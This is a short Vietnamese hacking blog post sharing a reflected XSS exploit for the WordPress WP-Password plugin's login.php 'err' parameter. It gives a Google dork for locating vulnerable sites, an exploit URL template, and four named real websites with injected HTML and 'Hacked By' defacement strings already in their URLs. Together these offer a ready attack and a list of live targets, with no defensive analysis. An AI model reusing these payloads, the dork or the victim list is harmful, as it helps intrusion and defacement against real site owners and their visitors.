Share Exploit WordPress-Password Plugin XSS Vulnerability

Exploit WP-Password Plugin XSS Vulnerability lỗi này xuất hiện trên các site dùng plugin WP-Password để quản lý mật khẩu và đăng nhập nhanh chỉ cần điền pass vào là có thể đăng nhập lỗi này tồn tại trên các bản cũ của plugin từ đầu năm 2015 nhưng hiện nay theo quan sát của mình thì vẫn còn rất nhiều site mắc phải lỗi này hôm nay mình xin chia sẻ cho các bạn lỗi này về chi tiết lỗi và các tìm kiếm lỗi này
tên lỗi: WordPress WP-Password Plugin XSS Vulnerability
người phát hiện : Arash Cyber

Google Dork: inurl:”/wp-content/plugins/wp-password/login.php”

Tested On: Windows – Linux

Site: Attacker-Team.org

# Link Test Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text}

Một số site đang mắc lỗi này

http://www.mtbma.org/wp-content/plugins/wp-password/login.php?err=%3Ch1%3Ev%C3%B4%20%C6%B0u%20vhb

http://doornkopresort.co.za/wp-content/plugins/wp-password/login.php?err=V%C3%B4%20%C6%AFu%20VHB

http://viviannail.com/wp/wp-content/plugins/wp-password/login.php?err=Hacker%20By%20V%C3%B4%20%C6%AFu%20VHB

http://www.salisburysingers.org/chorus/wp-content/plugins/wp-password/login.php?err=Hack%20By%20V%C3%B4%20%C6%AFu%20VHB

Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!